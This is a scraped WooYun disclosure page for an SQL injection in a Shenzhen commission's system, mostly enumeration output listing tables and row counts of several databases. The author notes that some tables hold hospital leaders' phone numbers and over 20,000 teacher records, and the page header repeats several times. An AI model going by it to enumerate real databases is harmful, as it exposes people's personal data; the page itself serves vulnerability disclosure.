| dbo.P_NEWS012              | 11      |
| dbo.doctor                 | 10      |
| dbo.online_question        | 10      |
| dbo.P_NEWS010              | 9       |
| dbo.P_NEWS011              | 9       |
| dbo.province_code          | 6       |
| dbo.dept                   | 5       |
| dbo.public_question_assign | 5       |
| dbo.public_question_assign | 5       |
| dbo.public_question_audit  | 5       |
| dbo.bbs_class              | 4       |
| dbo.bbs_thesis_state       | 4       |
| dbo.bbs_thesis_state       | 4       |
| dbo.P_VOTE001              | 4       |
| dbo.P_VOTE003              | 4       |
| dbo.users                  | 4       |
| dbo.P_NEWS009              | 3       |
| dbo.P_NEWS017              | 3       |
| dbo.vote                   | 3       |
| dbo.public_question_dept   | 2       |
| dbo.public_question_right  | 2       |
| dbo.leader                 | 1       |
| dbo.white_board_recv       | 1       |
| dbo.white_board_recv       | 1       |
+----------------------------+---------+

漏洞证明：

第五个库

Database: wsec
[65 tables]
+--------------------------+
| P_NEWS009                |
| P_NEWS010                |
| P_NEWS011                |
| P_NEWS012                |
| P_NEWS013                |
| P_NEWS017                |
| P_VOTE001                |
| P_VOTE002                |
| P_VOTE003                |
| P_VOTE004                |
| acc_count                |
| acc_log                  |
| atom_func                |
| bbs_affiche              |
| bbs_class                |
| bbs_forum                |
| bbs_level                |
| bbs_sys_affiche          |
| bbs_thesis_state         |
| bbs_thesis_state         |
| bbs_userface             |
| bbs_userface             |
| dept                     |
| doctor                   |
| download                 |
| dtproperties             |
| event                    |
| gov_dept                 |
| h_dept                   |
| ky_result                |
| leader_action            |
| leader_action            |
| menu_func                |
| mtc_t                    |
| mtc_v                    |
| news_right               |
| news_right               |
| news_type                |
| oldsite_file             |
| province_code            |
| public_question_1        |
| public_question_1        |
| public_question_assign_1 |
| public_question_assign_1 |
| public_question_audit_1  |
| public_question_audit_1  |
| public_question_dept_1   |
| public_question_dept_1   |
| public_question_mtc_1    |
| public_question_mtc_1    |
| public_question_reply_1  |
| public_question_reply_1  |
| public_question_return_1 |
| public_question_return_1 |
| public_question_right_1  |
| public_question_right_1  |
| read_log                 |
| role_menu                |
| roles                    |
| serv_item                |
| users                    |
| usr_role                 |
| vote                     |
| white_board_recv         |
| white_board_recv         |
+--------------------------+
Database: wsec
+----------------------------+---------+
| Table                      | Entries |
+----------------------------+---------+
| dbo.acc_log                | 308521  |
| dbo.role_menu              | 754     |
| dbo.read_log               | 281     |
| dbo.usr_role               | 243     |
| dbo.white_board_recv       | 233     |
| dbo.white_board_recv       | 233     |
| dbo.serv_item              | 200     |
| dbo.oldsite_file           | 155     |
| dbo.news_right             | 78      |
| dbo.news_right             | 78      |
| dbo.news_type              | 43      |
| dbo.event                  | 41      |
| dbo.P_NEWS013              | 36      |
| dbo.roles                  | 33      |
| dbo.mtc_t                  | 27      |
| dbo.menu_func              | 21      |
| dbo.h_dept                 | 20      |
| dbo.P_NEWS012              | 20      |
| dbo.ky_result              | 18      |
| dbo.atom_func              | 17      |
| dbo.P_VOTE002              | 17      |
| dbo.P_VOTE004              | 17      |
| dbo.P_NEWS010              | 12      |
| dbo.P_NEWS011              | 12      |
| dbo.bbs_forum              | 8       |
| dbo.leader_action          | 7       |
| dbo.leader_action          | 7       |
| dbo.gov_dept               | 6       |
| dbo.province_code          | 6       |
| dbo.users                  | 6       |
| dbo.bbs_level              | 5       |
| dbo.P_VOTE001              | 5       |
| dbo.P_VOTE003              | 5       |
| dbo.bbs_thesis_state       | 4       |
| dbo.bbs_thesis_state       | 4       |
| dbo.P_NEWS009              | 4       |
| dbo.P_NEWS017              | 4       |
| dbo.bbs_class              | 3       |
| dbo.bbs_userface           | 3       |
| dbo.bbs_userface           | 3       |
| dbo.dept                   | 3       |
| dbo.doctor                 | 3       |
| dbo.public_question_mtc_1  | 3       |
| dbo.public_question_mtc_1  | 3       |
| dbo.vote                   | 3       |
| dbo.bbs_affiche            | 2       |
| dbo.bbs_sys_affiche        | 2       |
| dbo.download               | 2       |
| dbo.public_question_1      | 2       |
| dbo.public_question_1      | 2       |
| dbo.public_question_dept_1 | 2       |
| dbo.public_question_dept_1 | 2       |
| dbo.acc_count              | 1       |
+----------------------------+---------+

看sysoa

Database: sysoa
[64 tables]
+---------------------+
| WORK_OUT_LOG        |
| WORK_OUT_LOG        |
| atom_func           |
| bbs_class           |
| bbs_thesis_state    |
| bbs_thesis_state    |
| bumph_bubbl_recv    |
| bumph_bubbl_recv    |
| bumph_bubbl_xnz     |
| cdb_info            |
| comment             |
| dept_work_plan_list |
| dept_work_plan_list |
| dept_work_plan_list |
| download            |
| dtproperties        |
| event               |
| fm_attach_send      |
| fm_file_FJ_log      |
| fm_file_FJ_log      |
| fm_file_FJ_log      |
| fm_file_log         |
| fm_group_empower    |
| fm_group_empower    |
| fm_group_rece       |
| fm_hos_rece         |
| fm_meet             |
| fm_recv             |
| fm_reply_file_log   |
| fm_reply_file_log   |
| fm_reply_log        |
| fm_right            |
| fm_send_file        |
| fm_send_log         |
| fm_type             |
| hospital            |
| leave_log           |
| leave_log           |
| menu_func           |
| mtc_t               |
| mtc_v               |
| news_type           |
| news_type           |
| plans               |
| read_log            |
| role_menu           |
| roles               |
| send_msg_log        |
| send_msg_log        |
| sysdiagrams         |
| task_doc            |
| task_doc            |
| task_manage         |
| task_txt            |
| test                |
| top_news            |
| unitAddrList        |
| users               |
| usr_role            |
| week_sum            |
| white_board         |
| work_plan           |
| work_report_log     |
| work_report_log     |
+---------------------+
Database: sysoa
+-------------------------+---------+
| Table                   | Entries |
+-------------------------+---------+
| dbo.unitAddrList        | 1665    |
| dbo.plans               | 380     |
| dbo.fm_send_log         | 343     |
| dbo.send_msg_log        | 269     |
| dbo.send_msg_log        | 269     |
| dbo.fm_hos_rece         | 266     |
| dbo.hospital            | 241     |
| dbo.fm_recv             | 233     |
| dbo.role_menu           | 217     |
| dbo.fm_reply_log        | 127     |
| dbo.mtc_t               | 119     |
| dbo.menu_func           | 79      |
| dbo.leave_log           | 73      |
| dbo.leave_log           | 73      |
| dbo.atom_func           | 71      |
| dbo.fm_right            | 71      |
| dbo.read_log            | 71      |
| dbo.work_report_log     | 69      |
| dbo.work_report_log     | 69      |
| dbo.usr_role            | 62      |
| dbo.users               | 48      |
| dbo.fm_send_file        | 37      |
| dbo.bumph_bubbl_recv    | 36      |
| dbo.bumph_bubbl_recv    | 36      |
| dbo.WORK_OUT_LOG        | 34      |
| dbo.WORK_OUT_LOG        | 34      |
| dbo.fm_group_rece       | 26      |
| dbo.work_plan           | 25      |
| dbo.bumph_bubbl_xnz     | 17      |
| dbo.fm_meet             | 17      |
| dbo.download            | 16      |
| dbo.cdb_info            | 13      |
| dbo.fm_file_log         | 13      |
| dbo.fm_type             | 12      |
| dbo.fm_file_FJ_log      | 11      |
| dbo.fm_file_FJ_log      | 11      |
| dbo.fm_file_FJ_log      | 11      |
| dbo.fm_attach_send      | 9       |
| dbo.roles               | 9       |
| dbo.test                | 9       |
| dbo.week_sum            | 9       |
| dbo.fm_group_empower    | 8       |
| dbo.fm_group_empower    | 8       |
| dbo.task_txt            | 7       |
| dbo.comment             | 6       |
| dbo.event               | 5       |
| dbo.bbs_class           | 4       |
| dbo.bbs_thesis_state    | 4       |
| dbo.bbs_thesis_state    | 4       |
| dbo.dept_work_plan_list | 4       |
| dbo.dept_work_plan_list | 4       |
| dbo.dept_work_plan_list | 4       |
| dbo.task_doc            | 4       |
| dbo.task_doc            | 4       |
| dbo.task_manage         | 2       |
| dbo.top_news            | 1       |
+-------------------------+---------+

hospital表
包含了各大医院的名称号码还有领导领导手机号码等等

第七个库

Database: mic
[106 tables]
+-----------------------+
| FLTalent              |
| FL_log                |
| Sheet1$               |
| acc_log               |
| atom_func             |
| audit_expert          |
| audit_group           |
| audit_item            |
| audit_result          |
| bb_list               |
| bb_log                |
| bb_master             |
| bb_mtc_t              |
| bb_result_fzr         |
| bb_result_list        |
| bb_result_master      |
| bb_result_people      |
| bb_result_unit        |
| bb_sel                |
| bb_subject            |
| bb_type               |
| city_code             |
| cx_item               |
| cx_log                |
| cx_status             |
| cx_type               |
| del_expert            |
| dept                  |
| download              |
| dtproperties          |
| e_query1$             |
| e_query2$             |
| e_query2$             |
| exp_audit             |
| exp_item_list         |
| exp_item_list         |
| exp_ps_info           |
| exp_study             |
| expert_choose         |
| expert_choose         |
| expert_group_list_1   |
| expert_group_list_1   |
| expert_group_list_2   |
| expert_group_subject  |
| expert_log            |
| foreign_language_list |
| foreign_leave_list    |
| foreign_study_list    |
| foreign_work_list     |
| hos_ky_info           |
| hospital_del          |
| hospital_del          |
| item                  |
| jt_exp                |
| jt_item               |
| jt_log                |
| menu_func             |
| module_menu           |
| module_role           |
| mtc_t                 |
| mtc_v                 |
| news_type             |
| news_type             |
| peixun                |
| province_code         |
| query_item            |
| query_item            |
| role_menu             |
| roles                 |
| send_msg              |
| sheet_items1$         |
| sheet_items2$         |
| sysdiagrams           |
| tech_audit_expert     |
| tech_audit_group      |
| tech_audit_item       |
| tech_audit_result     |
| tech_code             |
| tech_evaluate         |
| tech_item             |
| tech_log              |
| tech_proj_prov        |
| tech_proj_prov        |
| tech_report_evaluate  |
| tech_report_evaluate  |
| tech_report_teacher   |
| tech_req_log          |
| tech_req_log          |
| tech_teacher          |
| test20140630          |
| test20140630          |
| upload_log            |
| upload_log            |
| upload_type           |
| users_upd             |
| users_upd             |
| usr_role              |
| view_item_hz_city     |
| view_item_hz_proj     |
| white_board           |
| xlts_bbs_attach       |
| xlts_bbs_roll         |
| xmlException          |
| xmlLog                |
| xml_usr_role          |
| 瓒呯畻涓績鍊掑嚭涓撳              |
+-----------------------+
Database: mic
+---------------------------+---------+
| Table                     | Entries |
+---------------------------+---------+
| dbo.acc_log               | 1852376 |
| dbo.bb_log                | 296850  |
| dbo.cx_log                | 114975  |
| dbo.bb_result_people      | 81245   |
| dbo.bb_result_list        | 66962   |
| dbo.audit_result          | 66836   |
| dbo.tech_log              | 38465   |
| dbo.bb_result_fzr         | 36627   |
| dbo.jt_log                | 33938   |
| dbo.jt_exp                | 27605   |
| dbo.tech_teacher          | 27474   |
| dbo.cx_item               | 22412   |
| dbo.tech_req_log          | 20575   |
| dbo.tech_req_log          | 20575   |
| dbo.bb_result_master      | 17616   |
| dbo.tech_audit_result     | 15543   |
| dbo.usr_role              | 13812   |
| dbo.audit_item            | 13497   |
| dbo.expert_group_list_1   | 12828   |
| dbo.expert_group_list_1   | 12828   |
| dbo.send_msg              | 6044    |
| dbo.tech_report_evaluate  | 6038    |
| dbo.tech_report_evaluate  | 6038    |
| dbo.exp_study             | 5770    |
| dbo.jt_item               | 5521    |
| dbo.upload_log            | 5006    |
| dbo.upload_log            | 5006    |
| dbo.tech_audit_item       | 4255    |
| dbo.FL_log                | 2979    |
| dbo.exp_item_list         | 2976    |
| dbo.exp_item_list         | 2976    |
| dbo.expert_log            | 2927    |
| dbo.audit_expert          | 2396    |
| dbo.bb_result_unit        | 2272    |
| dbo.expert_group_list_2   | 2228    |
| dbo.tech_report_teacher   | 1794    |
| dbo.expert_group_subject  | 1764    |
| dbo.role_menu             | 1081    |
| dbo.foreign_work_list     | 1023    |
| dbo.peixun                | 1015    |
| dbo.foreign_study_list    | 969     |
| dbo.exp_audit             | 886     |
| dbo.tech_proj_prov        | 781     |
| dbo.tech_proj_prov        | 781     |
| dbo.foreign_language_list | 727     |
| dbo.test20140630          | 722     |
| dbo.test20140630          | 722     |
| dbo.hos_ky_info           | 688     |
| dbo.e_query1$             | 666     |
| dbo.tech_audit_expert     | 615     |
| dbo.audit_group           | 525     |
| dbo.FLTalent              | 497     |
| dbo.city_code             | 400     |
| dbo.bb_subject            | 247     |
| dbo.mtc_t                 | 214     |
| dbo.sheet_items1$         | 198     |
| dbo.foreign_leave_list    | 193     |
| dbo.tech_audit_group      | 170     |
| dbo.menu_func             | 150     |
| dbo.bb_master             | 145     |
| dbo.atom_func             | 135     |
| dbo.module_menu           | 116     |
| dbo.view_item_hz_city     | 109     |
| dbo.tech_code             | 90      |
| dbo.Sheet1$               | 71      |
| dbo.roles                 | 62      |
| dbo.sheet_items2$         | 58      |
| dbo.view_item_hz_proj     | 47      |
| dbo.tech_item             | 45      |
| dbo.bb_mtc_t              | 43      |
| dbo.module_role           | 35      |
| dbo.del_expert            | 33      |
| dbo.xlts_bbs_roll         | 32      |
| dbo.province_code         | 31      |
| dbo.download              | 25      |
| dbo.upload_type           | 24      |
| dbo.item                  | 19      |
| dbo.expert_choose         | 17      |
| dbo.expert_choose         | 17      |
| dbo.cx_status             | 15      |
| dbo.bb_sel                | 9       |
| dbo.xlts_bbs_attach       | 9       |
| dbo.bb_type               | 8       |
| dbo.cx_type               | 5       |
| dbo.dept                  | 5       |
| dbo.query_item            | 5       |
| dbo.query_item            | 5       |
| dbo.news_type             | 3       |
| dbo.news_type             | 3       |
| dbo.exp_ps_info           | 2       |
| dbo.users_upd             | 2       |
| dbo.users_upd             | 2       |
| dbo.hospital_del          | 1       |
| dbo.hospital_del          | 1       |
+---------------------------+---------+

有两万多老师信息
| dbo.tech_teacher | 27474 |

反正各种信息都有
丫丫的

修复方案：

版权声明：转载请注明来源 Yang@乌云

漏洞回应

厂商回应：

危害等级：高

漏洞Rank：10

确认时间：2015-05-26 10:21

厂商回复：

非常感谢您的报告。
报告中的问题已确认并复现.
影响的数据：高
攻击成本：低
造成影响：高
综合评级为：高，rank：10
正在联系相关网站管理单位处置。

WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0112065

漏洞标题：深圳市某委员会系统存在SQL注射导致上千表泄露

相关厂商：广东省信息测评中心

漏洞作者： Yang

提交时间：2015-05-22 12:05

修复时间：2015-07-10 10:22

公开时间：2015-07-10 10:22

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：15

漏洞状态：已交由第三方合作机构(广东省信息安全测评中心)处理

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 Yang@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞评价：

评论

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0112065

漏洞标题：深圳市某委员会系统存在SQL注射导致上千表泄露

相关厂商：广东省信息测评中心

漏洞作者： Yang

提交时间：2015-05-22 12:05

修复时间：2015-07-10 10:22

公开时间：2015-07-10 10:22

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：15

漏洞状态：已交由第三方合作机构(广东省信息安全测评中心)处理

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2015-0112065"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 Yang@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞评价：

评论

漏洞概要关注数(24) 关注此漏洞

Tags标签：无

4人收藏收藏
分享漏洞：